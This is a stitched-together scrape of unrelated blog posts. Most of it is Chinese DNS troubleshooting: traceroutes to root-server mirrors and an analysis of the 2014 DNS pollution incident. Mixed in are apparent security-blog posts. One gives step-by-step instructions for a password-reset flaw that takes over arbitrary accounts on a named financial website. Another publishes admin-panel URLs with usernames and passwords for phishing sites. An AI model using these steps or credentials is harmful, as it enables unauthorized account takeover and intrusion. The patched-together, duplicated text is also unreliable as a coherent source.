 4  * h242.s25.ts.hinet.net (168.95.25.242)  7.473 ms  7.358 ms
 5  tpdt-3012.hinet.net (220.128.4.30)  21.033 ms *  13.669 ms
 6  * * *
 7  * * r4001-s2.tp.hinet.net (220.128.11.133)  10.042 ms
 8  * 211-72-108-153.hinet-ip.hinet.net (211.72.108.153)  144.699 ms  144.337 ms
 9  paix.r1.pao1.isc.org (198.32.176.3)  145.071 ms *  145.100 ms
10  f.root-servers.net (192.5.5.241)  144.551 ms  144.491 ms  144.794 ms
最近的这个IP 198.32.176.3是美国IP。
第二次用VPN连到江苏再traceroute
traceroute to 192.5.5.241 (192.5.5.241), 64 hops max, 72 byte packets
 1  1.1.1.1 (1.1.1.1)  112.112 ms  108.556 ms  108.587 ms
 2  221.6.170.1 (221.6.170.1)  119.476 ms  118.213 ms  113.267 ms
 3  221.6.161.153 (221.6.161.153)  112.413 ms  118.053 ms  122.491 ms
 4  221.6.161.201 (221.6.161.201)  119.346 ms  121.014 ms  114.563 ms
 5  219.158.96.149 (219.158.96.149)  150.785 ms  150.258 ms  154.764 ms
 6  219.158.4.10 (219.158.4.10)  147.241 ms  147.273 ms  147.740 ms
 7  * 219.158.97.254 (219.158.97.254)  213.981 ms  205.347 ms
 8  219.158.102.154 (219.158.102.154)  334.414 ms  330.767 ms *
 9  las-bb1-link.telia.net (213.248.94.125)  505.146 ms  326.467 ms  316.009 ms
10  dls-bb1-link.telia.net (213.248.80.14)  361.110 ms  490.916 ms  360.979 ms
11  chi-bb1-link.telia.net (80.91.248.208)  404.532 ms  416.520 ms  454.820 ms
12  isc-117366-chi-bb1.telia.net (213.248.85.18)  456.797 ms  465.479 ms  468.200 ms
13  f.root-servers.net (192.5.5.241)  532.196 ms  494.677 ms  423.665 ms
结果显示先跑到江苏,然后到辽宁联通,然后离f.root-servers.net最近的80.91.248.208和213.248.85.18居然是欧洲IP。看来任播技术(anycast)是IP路由协议上的镜像行为,一个IP地址对应多个服务器,所以这个服务器在欧洲和美国都有。
然后我拜托陈少举帮我在中国境内tracert一下这个F-ROOT根域名服务器
C:\Users\chenshaoju>tracert 192.5.5.241
通过最多 30 个跃点跟踪到 f.root-servers.net [192.5.5.241] 的路由:
 1     4 ms    17 ms     4 ms  10.20.0.1 2     6 ms     4 ms     4 ms  10.20.0.1 3    23 ms     4 ms     5 ms  58.215.135.21 4    10 ms    11 ms    11 ms  61.177.102.13 5    31 ms    31 ms    32 ms  202.97.65.201 6     *        *        *     请求超时。 7    32 ms    32 ms    33 ms  18.254.120.106.static.bjtelecom.net [106.120.254.18] 8    42 ms    34 ms    32 ms  219.142.18.54 9    31 ms    32 ms    33 ms  218.241.102.10110    30 ms    39 ms    33 ms  218.241.107.9011    30 ms    72 ms    32 ms  f.root-servers.net[192.5.5.241]
跟踪完成。
好,这回离192.5.5.241最近的IP218.241.107.90是一个CNNIC的IP,可以证明F-ROOT还在中国,维基百科上说写的“中国根服务器被关闭”是错的。这里只查到CNNIC的F-ROOT,按照前文的说法,应该还有一个中国电信的F-ROOT,也许需要中国电信的IP才能查得到这个F-ROOT的位置。
J-ROOT也在北京:
C:\Users\chenshaoju>tracert 192.58.128.30
通过最多 30 个跃点跟踪到 j.root-servers.net [192.58.128.30] 的路由:
 1     5 ms     3 ms     3 ms  10.20.0.1 2     4 ms     4 ms     3 ms  10.20.0.1 3    24 ms     5 ms     9 ms  58.215.156.185 4     7 ms     5 ms     6 ms  58.215.156.185 5    10 ms     9 ms     7 ms  202.97.39.113 6     8 ms    11 ms    11 ms  202.97.48.30 7    27 ms    26 ms    26 ms  219.158.32.93 8    33 ms    32 ms    31 ms  219.158.13.21 9    30 ms    40 ms    30 ms  123.126.0.6610     *       30 ms     *     61.51.112.4211   138 ms   134 ms   136 ms  61.148.156.20212    37 ms    33 ms    33 ms  bt-235-194.bta.net.cn[202.106.235.194]13    25 ms    36 ms    32 ms  j.root-servers.net[192.58.128.30]跟踪完成。
tracert  I-ROOT的IP居然跑日本去了:
C:\Users\chenshaoju>tracert 192.36.148.17
通过最多 30 个跃点跟踪到 i.root-servers.net [192.36.148.17] 的路由:
 1     5 ms     4 ms     3 ms  10.20.0.1 2    10 ms     3 ms     4 ms  10.20.0.1 3     9 ms     4 ms     3 ms  58.215.135.21 4     7 ms    15 ms    14 ms  58.215.135.41 5     7 ms    15 ms    71 ms  202.97.27.6 6    25 ms    15 ms    11 ms  202.97.82.53 7    24 ms     8 ms    10 ms  202.97.50.250 8    41 ms    39 ms    39 ms  202.97.35.22 9    15 ms    13 ms    13 ms  202.97.60.9710   269 ms   266 ms   266 ms  202.232.8.12911   202 ms     *        *     osk004bb11.IIJ.Net[58.138.106.201]12    97 ms     *      128 ms  osk004bf01.IIJ.Net[58.138.82.189]13     *        *        *     请求超时。14   273 ms     *        *     tky001bb10.IIJ.Net[58.138.80.14]15   177 ms     *        *     tky001ix04.IIJ.Net[58.138.100.26]16     *        *      185 ms  as8674.dix-ie.jp [202.249.2.180]17   117 ms     *      125 ms  i.root-servers.net[192.36.148.17]
跟踪完成。
换个服务器
C:\Documents and Settings\Administrator>tracert 192.36.148.17
Tracing route to i.root-servers.net [192.36.148.17]over a maximum of 30 hops:
 1     5 ms     3 ms     2 ms  htuidc.bgp [42.51.7.65] 2     3 ms     2 ms     2 ms  htuidc.bgp.ip [103.22.188.65] 3     3 ms     2 ms     2 ms  route53.htu.cc [103.22.188.53] 4    12 ms     4 ms     1 ms  hn.kd.ny.adsl [182.118.124.17] 5     4 ms     1 ms     1 ms  pc177.zz.ha.cn [61.168.124.177] 6    58 ms    55 ms    56 ms  pc137.zz.ha.cn [61.168.255.137] 7    53 ms    53 ms    53 ms  219.158.99.153 8   114 ms   122 ms     *     219.158.3.222 9   163 ms     *      148 ms  219.158.97.5410   270 ms     *      205 ms  219.158.38.9811     *      244 ms   237 ms  ae-1.r01.tokyjp01.jp.bb.gin.ntt.net [129.250.3.241]12    93 ms    95 ms    97 ms  peering.r1.jpp.dnsnode.net [210.173.176.43]13   299 ms    69 ms   297 ms  i.root-servers.net [192.36.148.17]
Trace complete.
还是去日本了,看来用无锡电信、北京互联通和河南的网络接入均无法证明i-root在不在中国。据宫一鸣说:
其中I节点在2010年的GFW故障中因为给海外返回被污染的dns记录曾被人骂得狗血喷头,管理员满世界哭诉和他们无关, 有兴趣的可以翻翻这个陈年旧事  https://lists.dns-oarc.net/pipermail/dns-operations/2010-March/005260.html
看来I-Root节点自从2010年在国际上闯祸后就关闭路由通告了,一直没广播,难怪在国内也用tracert追踪不到i-root节点。
第一次tracert L-ROOT的IP也跑日本去了,估计是陈少举住的无锡访问日本更快。第二次换河南服务器:
C:\Documents and Settings\Administrator>tracert 199.7.83.42
Tracing route to l.root-servers.net [199.7.83.42]over a maximum of 30 hops:
 1    13 ms     3 ms     2 ms  htuidc.bgp [42.51.7.65] 2     3 ms     3 ms     2 ms  htuidc.bgp.ip [103.22.188.65] 3     3 ms     3 ms     2 ms  route53.htu.cc [103.22.188.53] 4     2 ms     9 ms     2 ms  hn.kd.ny.adsl [182.118.124.17] 5     2 ms     1 ms     2 ms  hn.kd.ny.adsl [125.45.253.25] 6    62 ms    63 ms    63 ms  pc233.zz.ha.cn [61.168.194.233] 7    22 ms    19 ms    19 ms  219.158.98.217 8    18 ms    15 ms    15 ms  202.96.12.190 9     *        *        *     Request timed out.10    18 ms    33 ms    19 ms  202.106.37.15411    16 ms    35 ms    16 ms  61.49.41.7412    16 ms    15 ms    16 ms  l.root-servers.net [199.7.83.42]
Trace complete.
这次得了一个中国的的L-ROOT了,离L-ROOT最近的61.49.41.74 是一个北京联通IP http://www.ip.cn/index.php?ip=61.49.41.74
目前证明F-ROOT、J-ROOT、L-ROOT都有镜像在中国北京。而在 http://www.root-servers.org 这个页面上搜索Beijing,则显示F、I、J、L四个服务器都有镜像在中国北京。
目前,全球共有13台套根域名服务器,其中美国10个,欧洲2个(位于英国和瑞典)、亚洲1个(位于日本),并在全球部署有三百多个根镜像服务节点,在中 国大陆地区有5个,覆盖了F、I、J、L 根。其中,F 根由ISC(Internet Systems Consortium)机构与CNNIC合作,在北京建设了两个F根镜像服务节点,由中国电信和CNNIC分别提供网络接入;Verisign与中国联通 合作,在北京建设了J根镜像服务器,中国联通提供接入。另外两个由CNNIC提供网络机房环境分别与Netnod、ICANN合作,在北京建设了I、L根 镜像服务节点。目前中国还有相关机构继续与国际合作实施更多的根镜像节点。
这样说就对了,F-ROOT有两个,I-ROOT、J-ROOT和L-ROOT各一个,CNNIC的F-ROOT找到了,但中国电信的F-ROOT没在中 国找到,I-ROOT我也没有办法证明在中国。也许哪位读者可以tracert一下找到,若能找到,麻烦贴下tracert结果吧。

我发现 gtld-servers也是13个,我以为跟F-ROOT这些有什么关系呢,这个 b.gtld-servers.net 好像也在北京有一份:
C:\Users\chenshaoju>tracert 192.33.14.30
通过最多 30 个跃点跟踪到 b.gtld-servers.net [192.33.14.30] 的路由:
 1     8 ms     5 ms     7 ms  10.20.0.1 2     3 ms     3 ms     5 ms  10.20.0.1 3     7 ms     7 ms     6 ms  61.177.102.105 4     5 ms     4 ms     6 ms  61.177.102.105 5     8 ms     7 ms     7 ms  202.97.39.233 6    15 ms    11 ms    11 ms  202.97.48.42 7    94 ms    98 ms    96 ms  219.158.35.89 8   134 ms   134 ms   214 ms  219.158.5.217 9    70 ms    34 ms    32 ms  123.126.0.7010     *       38 ms     *     124.65.56.1811    37 ms    29 ms    30 ms  61.148.6.4212    40 ms    37 ms    36 ms  bt-235-194.bta.net.cn [202.106.235.194]13    36 ms    51 ms    45 ms  b.gtld-servers.net [192.33.14.30]
跟踪完成。
离 b.gtld-servers.net 最近的IP 202.106.235.194 是联通的。

现在的问题是,不知道 在中国境内的F、I、J、L这五个根域名服务器,还有类似 b.gtld-servers.net 这样的顶级域名服务器在污染DNS方面做了些什么,不过可以合理怀疑中国的DNS根服务器不诚实,证据在下面两个链接中,这个事件发生在2010年:

2010年 ,有荷兰在线报道说《中国网络审查一不小心审出了国境
3月24日,智利的一名域名解析系统(DNS)管理人员发现互联网信息流通出现异常,向Youtube、Twitter、Facebook发出的访问要求均被劫持到中国的假网站和IP地址。
这个链接也说外国网络用户得到了来自这个中国根域名服务器污染后的Twitter、Facebook、YouTube的IP地址

第四部分 结论

DNS查询过程介绍
下次遇到类似今天的根域名服务返回假IP地址时如何查证呢?我建议步骤如下:
  1. 先确定F-ROOT、I-ROOT、J-ROOT、L-ROOT的IP存活于中国境内,方法就是tracert这几个镜像的IP,他们的IP是全球统一的,但映射多个主机,你要确认离你网络最近的根域名主机是在线的。根域名主机的IP到这找 http://www.internic.net/domain/named.root 
  2. 打开命令行,输入nslookup
  3. 然后输入set q=PTR
  4. 输入server 192.5.5.241
  5. 随便输入一个.com的域名,如 zuola.com
  6. 此时会返回 一串结果告诉你权威回答应该会在哪里:Authoritative answers can be found from:
    com nameserver = h.gtld-servers.net.
    com nameserver = j.gtld-servers.net.
    com nameserver = k.gtld-servers.net.
    com nameserver = g.gtld-servers.net.
    com nameserver = m.gtld-servers.net.
    com nameserver = i.gtld-servers.net.
    com nameserver = c.gtld-servers.net.
    com nameserver = f.gtld-servers.net.
    com nameserver = a.gtld-servers.net.
    com nameserver = d.gtld-servers.net.
    com nameserver = e.gtld-servers.net.
    com nameserver = b.gtld-servers.net.
    com nameserver = l.gtld-servers.net.
    a.gtld-servers.net internet address = 192.5.6.30
    b.gtld-servers.net internet address = 192.33.14.30
    c.gtld-servers.net internet address = 192.26.92.30
    d.gtld-servers.net internet address = 192.31.80.30
    e.gtld-servers.net internet address = 192.12.94.30
    f.gtld-servers.net internet address = 192.35.51.30
    g.gtld-servers.net internet address = 192.42.93.30
    h.gtld-servers.net internet address = 192.54.112.30
    i.gtld-servers.net internet address = 192.43.172.30
    j.gtld-servers.net internet address = 192.48.79.30
    k.gtld-servers.net internet address = 192.52.178.30
    l.gtld-servers.net internet address = 192.41.162.30
    m.gtld-servers.net internet address = 192.55.83.30
    a.gtld-servers.net has AAAA address 2001:503:a83e::2:30
  7. 输入 server 192.5.6.30
  8. 输入zuola.com
  9. 此时返回 Server: 192.5.6.30
    Address: 192.5.6.30#53
    Non-authoritative answer:
    *** Can't find zuola.com: No answer
    Authoritative answers can be found from:
    zuola.com nameserver = ns1.dreamhost.com.
    zuola.com nameserver = ns2.dreamhost.com.
    ns1.dreamhost.com internet address = 66.33.206.206
    ns2.dreamhost.com internet address = 208.96.10.221
  10. 上面返回的结果里包含了真正的nameserver的域名和IP,输入 server 66.33.206.206
  11. 会返回> server 66.33.206.206
    Default server: 66.33.206.206
    Address: 66.33.206.206#53
  12. 输入set q=a
  13. 输入zuola.com 
  14. 返回> zuola.com
    Server: 66.33.206.206
    Address: 66.33.206.206#53
    Name: zuola.com
    Address: 69.163.141.215
  15. 这样,就查到域名zuola.com 的真实IP为 69.163.141.215 了
第一步先是找到最近的根域名,第二步根域名返回gTLD地址,第三步gTLD返回name server地址和IP,第四步name server返回域名的真实IP。

ROOT Server返回域名应该去哪个gTLD找,gTLD提供一个最近的服务器告诉你哪个域名解析服务器(name server)上记录了你的域名对应的IP,gTLD的服务器上亦登记了域名解析服务器(name server)的域名和真实IP,在我的例子中,ns1.dreamhost.com和66.33.206.206的信息就记录在gtld- servers.net的A到M的13台服务器上。

下面这张图更清晰的描述的DNS解析过程:
2014年1月21日下午3点左右的dig操作却没有上图的第二步和第三步返回gTLD server和name server过程,直接跳过name server这个环节返回了一个65.49.2.178的地址,下面两张图都没有gTLD服务器出现,也没有name server,所用延时极短就返回65.49.2.178这个假IP。第一张图显示只用了27毫秒,第二张图显示只用了36毫秒。


我的理解是,机房的边界路由器上有一个GFW,把正常查询DNS的UDP结果污染了,由于要路过GFW,所以返回了一个假的IP。前些年GFW只在中国出境流量上污染DNS查询结果,现在机房流量也要被GFW审查了。

我的结论是,这是一次中国境内的DNS污染事故,是尝试在机房的GFW审查设备做网络封锁时做出的honest mistake(无意犯下的过错),可能是封锁自由门的IP时操作成封锁所有域名了。

我的简介

我的照片

我是一个非典型愤青,喜欢玩,喜欢自由自在,喜欢做些有用或者有趣的事,喜欢看到新鲜的世界,喜欢做一些能让我得到简单的快乐的事情——从小事情里寻找到乐趣——快乐总是很简单的。没有豪言壮语和远大理想,混一天算一天。

我讨厌共产党,讨厌中国传统文化,讨厌称兄道弟,讨厌牛逼哄哄的领导,讨厌威权主义,讨厌回贴不看贴,讨厌不了解别人的语言环境就批判个没完的人,讨厌拒绝倾听拒绝沟通的左愤和右愤,讨厌只用十分钟观察就评判别人一生的人。

没有野心,不买彩票,不赌钱,不抽烟,不偏执,随遇而安。大部分的时间,除了做宅男,其他时间在交通工具上。
就这样活下去,很好。

另一方面,我在尽量不给地球增加负担,也尽量不给朋友们添加负担,期望地球越来越好,期望我的朋友们越来越幸福。

网志归档

►  2015 ( 22 )
 =====
 http://wtfsec.
Due to the need (penetration testing, leak sweep), often you need to use a variety of vulnerability scanning tools for testing, and report to excel extract unified document. Sometimes, because of the workload it is very large and extremely tired. This tool is now open.
Program interface is as follows:
AWVS報告提取工具
EXCEL results AWVS extracted as follows (extracts only the high, dangerous vulnerabilities, and automatically translated by bing):
AWVS報告提取工具
AWVS報告提取工具 Click to download

 ===



  http://wtfsec.
 

由於工作需要(滲透測試,漏掃),經常需要使用各種漏洞掃描工具進行測試,並將其報告統一提取至excel文檔。有時候會因為工作量十分龐大而勞累萬分。現將此工具公開。
程序界面如下:
AWVS報告提取工具
AWVS提取後的EXCEL結果如下(只提取高,中危險漏洞,並通過bing自動翻譯):
AWVS報告提取工具
AWVS報告提取工具點擊下載

 ===
 http://wtfsec

Information and financial security) China Gold Investment Network

Detailed description:

This is a password reset flaw, in our own phone number password reset, stopped in the final step to enter a new password submission, enter the destination phone number in a new tab, then click send reset verification code back to us reservations page. Click Submit, target phone number password change successful.
Vulnerability Address:
http://passport2.cngold.org/account/password/forgot.htm?service=
1, enter the phone number of our own:
中国金投网存在重大设计缺陷影响任意用户(涉及个人信息和资金安全)
2. Enter the correct validation code received, to the next step:
中国金投网存在重大设计缺陷影响任意用户(涉及个人信息和资金安全)
3, the input we have to reset a new password, leave the page, first do not submit:
中国金投网存在重大设计缺陷影响任意用户(涉及个人信息和资金安全)
4, open a new tab, forgot password, enter the target phone number of the image verification code, submit:
中国金投网存在重大设计缺陷影响任意用户(涉及个人信息和资金安全)
5, back to our reservation page, click submit, password reset successfully.
中国金投网存在重大设计缺陷影响任意用户(涉及个人信息和资金安全)
Although the display password reset success is our own phone number, but the password is already the target phone number has been modified

Vulnerability to prove:

We reset the password with a target phone number, login is successful, as shown below:
中国金投网存在重大设计缺陷影响任意用户(涉及个人信息和资金安全)
Affect your business as follows
中国金投网存在重大设计缺陷影响任意用户(涉及个人信息和资金安全)
Harmfulness imagined! ! ! As it involves the safety of funds, go beyond that.

 =====
 http://wtfsec

詳細說明:

這是一個密碼重置漏洞,在對我們自己手機號密碼重置,在最後一步輸入新密碼提交時停住,在新選項卡中輸入目標手機號,點擊發送重置驗證碼後,回到我們保留的頁面。點擊提交,目標手機號密碼修改成功。
漏洞地址:
http://passport2.cngold.org/account/password/forgot.htm?service=
1、輸入我們自己的手機號碼:
中國金投網存在重大設計缺陷影響任意用戶(涉及個人信息和資金安全)
2、輸入收到的正確驗證碼,進入下一步:
中國金投網存在重大設計缺陷影響任意用戶(涉及個人信息和資金安全)
3、輸入我們要重置的新密碼,保留該頁面,先別提交:
中國金投網存在重大設計缺陷影響任意用戶(涉及個人信息和資金安全)
4、打開一個新選項卡,在忘記密碼處輸入目標手機號的圖片驗證碼,提交:
中國金投網存在重大設計缺陷影響任意用戶(涉及個人信息和資金安全)
5、回到我們保留的頁面,點擊提交,密碼重置成功。
中國金投網存在重大設計缺陷影響任意用戶(涉及個人信息和資金安全)
雖然顯示密碼重置成功的是我們自己的手機號,但是目標手機號的密碼已然已被修改

漏洞證明:

用我們重置的密碼登陸目標手機號,登陸成功,如下圖所示:
中國金投網存在重大設計缺陷影響任意用戶(涉及個人信息和資金安全)
影響你們如下業務
中國金投網存在重大設計缺陷影響任意用戶(涉及個人信息和資金安全)
危害性可想而知!!!由於涉及資金安全,點到為止。

 =====
 http://wtfsec
 Starts: Where I do not say, huh?
Transaction heavy, long story short

XSS length limit and escape the problems we have on a fishing fall and learned through constant color
We changed the play, what is the bulk? Batch program is not necessarily automatic. Manual also possible (follow my left hand, right hand, a slow-motion. Keke digress)
0x001 Thinking
I feel that this time the fishing is certainly not a precedent, it will certainly not be the last case. On the phone after exposure, although I, the website linked to the ...
(Loved) Keke, but there are still many identical phishing sites and similar tactics to deceive everyone. So I started a research fishing station. Since the fishing station hung up so I intend to start from the title.
Below this picture is the last picture of the article, I found that he is entitled: Pocket Portal - China Mobile.
再谈伪基站钓鱼,不堪一击
0x002 information collection
Open google, enter: Pocket Portal - China Mobile
再谈伪基站钓鱼,不堪一击
10086 immediately find a lot of similar official website domain name. Open look.
再谈伪基站钓鱼,不堪一击
Sure enough! And the last page of my fishing is the same
I thought for a moment back, contrast and getting information through the brain following ↓
Usually xxx.com/wap.asp / a Home
xxx.com/admin/login.asp / Administrator Login
xxx.com/admin/order.asp / victim's bank card, ID card, telephone, storage place
xxx.com/admin/admin_manage.asp / administrator to modify, add
And verification of the number of characters js class ...
I google the address from a fishing station just opened verify my address above to see it is not the same
I expected is a routine, huh da (digression: I really do not know how such a program to sell so expensive)
0x004 pass to kill fishing station
Take my last diagram Come on, below.
Vulnerability 1: js no restrictions on password. Lost xss. Management.
再谈伪基站钓鱼,不堪一击
Vulnerability 2: admin / admin_manage.asp // access the file unauthorized access. Direct burst administrator account password
Here are some test time to get, and to give everyone the welfare of when.



http://www.10086tfff.com/admin/login.asp
user: gxfc pass: 128824
http://wap.10086yio.com/admin/login.asp
admin 130130
http://l0086dyz.com/adminjt/logn.asp
admin 1234566

abc 1234566
  • This effort is really ah ~, backstage directory changed ... *
http://wangyibao.sediaozs.com/admin/
admin
310310
PS: We are interested can go to download app fishing station, reverse what search: const-string will probably find authors phone, talk to author talk about life played on my mind .. or loading sister paper added about the micro-credit cooperatives, etc.


 =====
 http://wtfsec

首發:哪裡不用我說了哈?
事務繁重,長話短說

XSS長度限制及轉義的問題我們已經通過時時彩淪陷和上一篇釣魚了解到了
我們換玩法了,什麼是批量?批量並不一定就是程序自動化。手動也可以的(跟著我左手,右手,一個慢動作。咳咳扯遠了)
0x001 思考
我感覺到這一次的釣魚肯定不是先例,也肯定不會是最後一例。雖然我曝光作者手機後,網站掛了...
(喜聞樂見)咳咳,但是依然有許多一模一樣的釣魚網站和相似的手法欺騙著大家。所以我就開始了釣魚站的一次研究。由於釣魚站掛了所以我就打算從標題入手。
下面這張圖是上次文章的圖片,我發現他的標題為:掌上門戶-中國移動。
再談偽基站釣魚,不堪一擊
0x002 信息收集
打開google,輸入:掌上門戶-中國移動
再談偽基站釣魚,不堪一擊
馬上就發現很多相似10086官網的域名。打開一看。
再談偽基站釣魚,不堪一擊

果然!和上次釣我的頁面是一樣的
我回想了一下,經過大腦和得到的信息對比如下↓
一般都是xxx.com/wap.asp /為主頁
xxx.com/admin/login.asp /管理員登錄
xxx.com/admin/order.asp /受害者銀行卡號,身份證,電話,存放地方
xxx.com/admin/admin_manage.asp /管理員修改、添加
以及一些js的字元驗證之類的...
我就從google的地址隨便打開個釣魚站驗證我上面的地址看是不是一樣的
不出我所料都是一個套路,呵呵噠(題外話:真不知道這樣的程序為什麼賣那麼貴)
0x004 通殺釣魚站
就拿我上次的圖來吧,如下。
漏洞1:js沒有對密碼限制。丟xss。等管理。
再談偽基站釣魚,不堪一擊
漏洞2:admin/admin_manage.asp //訪問該文件越權訪問。直接爆管理員帳號密碼
下面是一些test時搞到的,送給大家當福利了。



http://www.10086tfff.com/admin/login.asp
user:gxfc pass:128824

http://wap.10086yio.com/admin/login.asp
admin 130130

http://l0086dyz.com/adminjt/logn.asp
admin 1234566

abc 1234566

  • 這個真是心機啊~,後台目錄改了...*
http://wangyibao.sediaozs.com/admin/
admin
310310

PS:大家有興趣的可以去下載釣魚站的app,逆向一下搜索:const-string 就可能發現作者手機,打過去跟作者聊聊人生,心事..或者裝妹紙添加微信社一下等等


 =====
 http://www.zhoushuguang.com


January 24, 2014, Friday


Chinese users access on the territory of .com and .net domain name is resolved to the issue I have a new found 65.49.2.178

Chinese users access on the territory of .com and .net domain name is resolved to 65.49.2.178 issue I have a new discovery, I discovered why .cn and .org domain names point to reasons not affected 65.49.2.178 prove this accident and root name servers irrelevant.

In the previous article , I found the IP 65.49.2.178 this context, verify the root name servers in China, mirroring, refuted the major media and Wikipedia says "root name server is only 13, the only one in Asia Taiwan in Japan, "saying that speculation DNS pollution accidents from this incident was a domestic room.

I noticed that the National Internet Emergency Center announcement mentioned only ".com", ". net" and other end of the site affected, and .cn end of the site is not affected, .org end of the site is not mentioned, but also should not be affected:
On January 21 our territory Internet access exceptions briefing Source: CNCERT Time: 2014-01-22
At 15:20 on January 21, 2014, a large number of Internet users in China can not access the domain name with ".com", ". Net" and other end of the site. After the incident, the first time the National Internet Emergency Response Center launched the emergency response mechanism to coordinate the organization part of the technical support unit for investigation and emergency response, 16: 50, users access returned to normal.
Have been mastered by the analysis of the data, the initial judge the event is due to cyber attacks by Internet users in China in the international top-level domain service exception occurs when parsing the source of attack is under investigation.
Why .cn and ending in .org site is not affected?
Let's look at the normal domain name resolution process:
  1. The first step, DNS will return to the "root name servers" address and IP, the image above is root-servers.net end of the address;
  2. The second step, the root name server 192.33.4.12 return gTLDs (gTLD) server address and IP;
  3. The third step, gTLD server returns NS (name server) address and the IP, the image above is ns1.dreamhost.com;
  4. The fourth step, NS return to the real IP address of the domain name corresponding to the image above is 69.163.141.215.
Here is dig + trace zuola.com and dig + trace dbanotes.net result, the display to ".com", ". Net" and other domain names ending in the second step is the end of the return address of the server gtld-server.net ; and to ".org" domain name with another domain name server.


Here is the result of dig + trace 1kg.org this domain, also need to initiate the first step in DNS queries, the result returned is the same root name server address, the second step is not returned by the end of the server gtld-server.net address, is the end of the address org.afilias-nst.org and org.afilias-nst.info


Here are the results dig + trace hightechlowlife.cn this domain, .cn and .org domain names also need to DNS queries initiated the first step to obtain the correct root name server address; the second step is not returned gtld-server .net at the end of the server address, nor is org.afilias-nst.org and org.afilias-nst.info the end of the address, is dns.cn the end of the address:


Well, .cn and .org domain names also need to initiate the first step in DNS queries, query results are also obtained with .com .net domain names with the same "root name servers", and only the second step returned a different result . This proves that the incident with the "root name servers" nothing to do. Such a distinction might be able to explain why and .org domain names .cn not been affected.

The following figure from DNSPod of BLOG , confirmed January 21, 2014 visit .com domain will get 65.49.2.178 this IP:

No Return generic top-level domain (gTLD) server address and IP, there is no return name server address.

No Return generic top-level domain (gTLD) server address and IP, there is no return name server address.

I put another track with a dig in China January 22, 2014 twitter.com domain name resolution process picture:

Photo by Shao cite provided

Twitter.com domain name was hijacked to 203.98.7.65 this IP, and from http://whois.webhosting.info/203.98.7.65 view, this IP is not the twitter of IP, performance and hijacking the domain name January 21, 2014 in to 65.49.2.178 exactly the same: No Return generic top-level domain (gTLD) server address and IP, there is no return name server address.

Complete and correct analysis should be the same as shown in four return data:

Photo by Shao cite provided

in conclusion:
Internet users in our country exception occurs when the service resolving international top-level domain, ". Com", ". Net" domain name is resolved to 65.49.2.178 is a DNS pollution behavior, and GFW pollution Twitter.com, Facebook.com Youtube.com, Zuola.com domain names of the performance is the same, nothing to do with the root name servers. .cn and .org site is not affected by the end of the proof, the GFW may be accidentally contaminated gtld-servers.net domain name added to the list, the next encounter the same part of the domain name, then affected with the use of dig + trace gtld-servers.net to troubleshoot it.

These views may not be absolutely correct, please add the possibility and evidence.

 =====
 http://www.zhoushuguang.com

2014年1月24日星期五


关于中国境内用户访问.com 和.net 域名被解析到 65.49.2.178 一事我又有新发现

关于中国境内用户访问.com 和.net 域名被解析到65.49.2.178 一事我又有新发现,我发现了为什么.cn 和.org 的域名没有受到影响指向65.49.2.178的原因,证明此事事故与根域名服务器无关。

上一篇文章中,我查到了65.49.2.178这个IP的背景,验证了根域名服务器在中国有镜像,驳斥了各大媒体和维基百科上说“根域名服务器只有13台,亚洲唯一的一台在日本”的说法,猜测这事件是一次来自国内机房的DNS污染事故。

我注意到  国家互联网应急中心 的通告提到仅有“.com”、“.net”等结尾的网站受到影响,而.cn结尾的网站没有受到影响,.org 结尾的网站没有被提到,也应该是没有受到影响:
关于1月21日我国境内互联网访问异常情况的通报
来源:CNCERT 时间:2014-01-22
2014年1月21日15:20,中国境内大量互联网用户无法正常访问域名以“.com”、“.net”等结尾的网站。事件发生后,国家互联网应急中心第一时间启动应急响应机制,协调组织部分技术支撑单位进行调查和应急处置,16:50左右,用户访问基本恢复正常。
经对已掌握的数据进行分析,初步判断此次事件是由于网络攻击导致我国境内互联网用户通过国际顶级域名服务解析时出现异常,攻击来源正在进一步调查中。
为什么.cn 和 .org  结尾的网站没有受到影响?
我们先来看正常的域名解析过程:
  1. 第一步,DNS会返回“根域名服务器”地址和IP, 上图中是root-servers.net结尾的地址; 
  2. 第二步,根域名服务器192.33.4.12返回通用顶级域名(gTLD)的服务器地址和IP; 
  3. 第三步,gTLD服务器返回NS(name server)地址和IP,上图中是ns1.dreamhost.com; 
  4. 第四步,NS返回域名对应的真正的IP地址, 上图中是69.163.141.215。
下面是dig +trace zuola.com 和 dig +trace dbanotes.net 的结果,显示以“.com”、“.net”等结尾的域名在第二步返回的都是 gtld-server.net结尾的服务器地址; 而以“.org”的域名用的是另一种域名的服务器。
下面是dig +trace 1kg.org 这个域名的结果,同样需要向DNS发起第一步查询,返回的结果是相同的根域名服务器地址,第二步返回的却不是以 gtld-server.net结尾的服务器地址,是org.afilias-nst.org 和 org.afilias-nst.info 结尾的地址
下面是dig +trace hightechlowlife.cn 这个域名的结果,.cn 和 .org 的域名同样需要向DNS发起第一步查询,得到了正确的根域名服务器地址; 第二步返回的却不是 以gtld-server.net结尾的服务器地址,也不是以org.afilias-nst.org 和 org.afilias-nst.info 结尾的地址,是以dns.cn结尾的地址:
好了,.cn 和 .org 的域名同样需要向DNS发起第一步查询,也都得到与.com 跟.net 域名相同的“根域名服务器”查询结果了,仅有第二步返回的结果不同。这证明此次事件与“根域名服务器”完全没有关系。这样一区分,也许能解释为什么.cn 和.org 的域名没有受到影响了。
下图来自DNSPod的BLOG,证实2014年1月21日访问.com 域名会得到65.49.2.178这个IP:
没有返回返回通用顶级域名(gTLD)的服务器地址和IP,也没有返回name server 地址。

没有返回返回通用顶级域名(gTLD)的服务器地址和IP,也没有返回name server 地址。
我再贴一张2014年1月22日在中国境内用dig追踪twitter.com 域名解析过程的图片:
图片由陈少举提供
Twitter.com的域名被劫持到203.98.7.65这个IP了,从 http://whois.webhosting.info/203.98.7.65 来看,这个IP不是twitter的IP,表现和2014年1月21日的劫持域名到65.49.2.178完全一样:没有返回返回通用顶级域名(gTLD)的服务器地址和IP,也没有返回name server 地址。
完整无误的解析应该是如下图一样分四次返回数据:
图片由陈少举提供
结论:
我国境内互联网用户通过国际顶级域名服务解析时出现异常,“.com”、“.net”域名被解析到 65.49.2.178是一次DNS污染行为,和GFW污染Twitter.com 、Facebook.com Youtube.com 、 Zuola.com 等域名的表现是一致的,与根域名服务器完全无关。.cn 和 .org  结尾的网站没有受到影响则证明,可能是此次GFW不小心把gtld-servers.net 加入污染域名的列表了,下次遇到同样的部分域名受影响的话用用dig +trace gtld-servers.net来排查吧。
以上观点不一定绝对正确,欢迎补充可能性和证据。

 =====
 http://www.zhoushuguang.com


 High-speed servers unblocking and securing your Internet connection.
Professional support staff ready to assist you when needed.
14-day 100% money back guarantee. Absolutely hassle-free!
